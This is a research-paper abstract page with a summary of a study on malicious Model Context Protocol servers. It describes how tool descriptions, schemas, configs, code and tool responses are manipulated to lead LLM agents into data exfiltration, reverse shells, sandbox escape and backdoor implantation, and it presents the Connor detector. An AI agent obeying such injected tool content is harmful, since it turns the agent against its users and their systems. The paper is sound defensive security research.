From Component Manipulation to System Compromise: Understanding and Detecting Malicious MCP Servers

Published 2 Apr 2026 in cs.CR and cs.SE | (2604.01905v1)

Abstract: The model context protocol (MCP) standardizes how LLMs connect to external tools and data sources, enabling faster integration but introducing new attack vectors. Despite the growing adoption of MCP, existing MCP security studies classify attacks by their observable effects, obscuring how attacks behave across different MCP server components and overlooking multi-component attack chains. Meanwhile, existing defenses are less effective when facing multi-component attacks or previously unknown malicious behaviors. This work presents a component-centric perspective for understanding and detecting malicious MCP servers. First, we build the first component-centric PoC dataset of 114 malicious MCP servers where attacks are achieved as manipulation over MCP components and their compositions. We evaluate these attacks' effectiveness across two MCP hosts and five LLMs, and uncover that (1) component position shapes attack success rate; and (2) multi-component compositions often outperform single-component attacks by distributing malicious logic. Second, we propose and implement Connor, a two-stage behavioral deviation detector for malicious MCP servers. It first performs pre-execution analysis to detect malicious shell commands and extract each tool's function intent, and then conducts step-wise in-execution analysis to trace each tool's behavioral trajectories and detect deviations from its function intent. Evaluation on our curated dataset indicates that Connor achieves an F1-score of 94.6%, outperforming the state of the art by 8.9% to 59.6%. In real-world detection, Connor identifies two malicious servers.

Abstract PDF Upgrade to Chat

Authors (8)

Summary

The paper presents a component-centric methodology that identifies 16 unique multi-component attack techniques in MCP servers.
It validates attack efficacy through rigorous experiments across industrial platforms, noting 100% success rate for direct code injection.
It introduces Connor, a two-stage behavioral deviation detection framework achieving a 94.6% F1 score and minimal false alerts.

Understanding and Detecting Malicious MCP Servers: A Component-Centric Attack and Defense Paradigm

Introduction and Motivation

The proliferation of the Model Context Protocol (MCP) for external tool integration in LLM-powered systems introduces new, complex security risks that extend beyond classical supply chain attacks. The paper "From Component Manipulation to System Compromise: Understanding and Detecting Malicious MCP Servers" (2604.01905) exposes fundamental limitations in prevailing MCP security taxonomies and unveils novel multi-component attack primitives. To address both analytic and practical defense gaps, the authors develop a comprehensive component-centric attack methodology and instantiate Connor, a two-stage behavioral deviation detection framework for MCP servers.

Component-Centric Attack Surface Characterization

Prevailing approaches abstract attacks by observable effects rather than the mechanism of maliciousness propagation through MCP server architecture. This work pivots to a component-centric model, mapping explicit attack surfaces—tool descriptions, argument schemas, server configuration, tool/resource code, and post-execution responses.

Figure 1: The MCP architecture, delineating attackable surfaces for malicious manipulation across servers, clients, and hosts.

The authors conduct a high-fidelity enumeration of feasible intra-server attack chains using a canonical signature encoding (mediation, stage, sink, and carrier type). This yields 26 distinct influence paths, systematically de-duplicated to 16 semantically unique mechanisms, and augmented to 19 for coverage validation. For each path, instantiations target established adversarial goals including data exfiltration, reverse shell, integrity violation, payload deployment, sabotage, and backdoor implantation. Their PoC dataset comprehensively saturates the attack technique space present in the literature, covering direct code injection, puppet attacks, control-flow hijacking, resource poisoning, shadowing, multi-tool coordination, and sandbox escape.

Empirical Analysis of Attack Efficacy

The practical exploitability of these attack mechanisms is validated across two industrial MCP host platforms and five state-of-the-art LLMs. The results highlight several fundamental findings:

Component position fundamentally determines attack success probability. Pre-execution context (descriptions/schemas) is significantly more vulnerable to prompt injection than post-execution artifacts.
Multi-component composition consistently enables higher success rates by distributing logic to evade single-point LLM-based or pattern-based defenses—compositions outperform single-component attacks on all platforms.
Direct code injection remains universally effective (100% ASR) in current MCP host implementations, underlining the systemic absence of practical source code validation in the wider ecosystem.
Attack efficacy is highly host/LLM-dependent with marked variance; host-side security controls (e.g., Claude Desktop) can entirely nullify prompt injection attacks targeting builtins, while LLM-internal resilience varies.
Extending exploit chains (beyond two MCP execution cycles) reduces success probability due to compounded complexity and LLM reasoning unpredictability.
Figure 2: Multi-vector threat taxonomy for malicious MCP server distribution via marketplaces, highlighting dual-channel (code and context) attack propagation.

This rigorous experimental protocol demonstrates the infeasibility of chain extension for practical attacks, empirically grounding the two-stage upper bound chosen for attack PoC design.

The Connor Defense Architecture: Behavioral Deviation Detection

To sidestep the signature overfitting and component-isolation limitations of existing MCP defenses, the authors introduce Connor—a detection pipeline leveraging step-wise behavioral deviation from function intent.

Figure 3: Schematic overview of the Connor framework: static intent/model analysis precedes live behavioral tracing with dynamic deviation detection.

Connor operates in two phases:

Pre-execution analysis: Shell command (config) analysis fuses structural parsing with LLM-based semantic interpretation for robust detection of complex, obfuscated malicious commands. Descriptions and schemas are parsed by a tuned LLM to split legitimate functional intent from injected adversarial intent.
In-execution analysis: Under a simulated host environment mapping MCP builtins (mirroring real deployment), Connor drives agent execution via intent-aligned queries. All invoked MCP components (code and context) are instrumented, code semantics are extracted using Joern-based inter-procedural slicing and LLM summarization. Behavioral deviation is then judged on a trajectory (multi-step) basis against the extracted functional intent baseline, using hierarchical verdicts (allow/warn/block).

Crucially, this approach enables early and fine-grained detection of multi-stage and compositional attacks that single-step or purely static approaches systematically miss.

Evaluation and Comparative Results

Detection effectiveness: On a curated 134-malware dataset, Connor achieves an F1 of 94.6%, a margin of +8.9–59.6% over open-source and industry baselines (MCP-Scan, AI-Infra-Guard, MCPScan). Its precision is 98.4%, with recall 91.1%; importantly, FNs are predominantly unreachable behaviors missed due to runtime non-exercise or attacks entirely out-of-scope (hardcoded test logic, integrity-only violations).
Ablation: Disabling code semantic summarization catastrophically degrades recall and precision. Intent extraction and config analysis are significant but not pivotal. Replacing program slicing with full code summaries balloons LLM cost by 187.4% while achieving no accuracy gain, validating slicing necessity for practical deployment.
Real-world applicability: When deployed across 1,672 marketplace MCP servers, Connor yields the lowest alert rate (0.54%) and uniquely discovers two confirmed, previously unknown malware servers, reducing analyst burden by up to 98.4% compared to baselines.
Pipeline generality: Behavioral deviation detection based on functional intent—rather than chain signatures or path enumeration—demonstrates strong generalization: 91.7% detection on external PoCs with diverse attack goals and methodologies.

Practical and Theoretical Implications

Connor’s methodology enforces a shift from component-isolation and pattern-based alerting, towards holistic, function-intent-driven analysis. This enhances detection capacity against emergent, novel, cross-component adversarial strategies and minimizes the risk of zero-day escape via attack surface recombination.

For ecosystem developers, these results underline the critical need for robust MCP server vetting prior to deployment, regardless of host/LLM, and raise urgent requirements for standardized source code auditing pipelines. The data suggests LLM-side instruction filtering is insufficient in the face of compositional attacks manipulating MCP protocol surfaces.

Theoretically, this work introduces a framework for systematic attack enumeration and exhaustiveness in compositional tool ecosystems—immediately applicable to other modular AI-agent integration protocols.

Limitations and Future Work

The presented defense assumes availability of MCP server code and does not incorporate inter-server compositional attacks. Detection is limited to behaviors exercised at runtime; latent code paths may evade analysis absent adversarial triggering. Query generation aligns to intent—multi-tool attacks implicit in user-driven, non-canonical sequences may be missed in simulation but are detectable via proxying in real host deployments.

Future research should extend to support inter-server/cross-domain attack composition, integration with static advanced payload tracing, and zero-configuration analysis of parameterized, environment-dependent servers. Additionally, investigation into LLM-based code summarization reliability and defenses against adversarial summarization evasion warrants exploration.

Conclusion

This study establishes a systematic, component-centric methodology for analyzing risk in Model Context Protocol-powered LLM ecosystems and empirically demonstrates the superiority of behavioral deviation-based detection over prevailing MCP security tools. The Connor framework’s efficacy in uncovering both synthetic and real-world malware underscores its utility for practical defense at scale, while its analytic results provide a new foundation for supply chain and cross-component attack modeling in AI agent infrastructure.

Figure 4: Dynamic interplay of LLM reasoning, MCP server manipulation, and host-provided builtin tool exploitation facilitating indirect system compromise.

Markdown Report Issue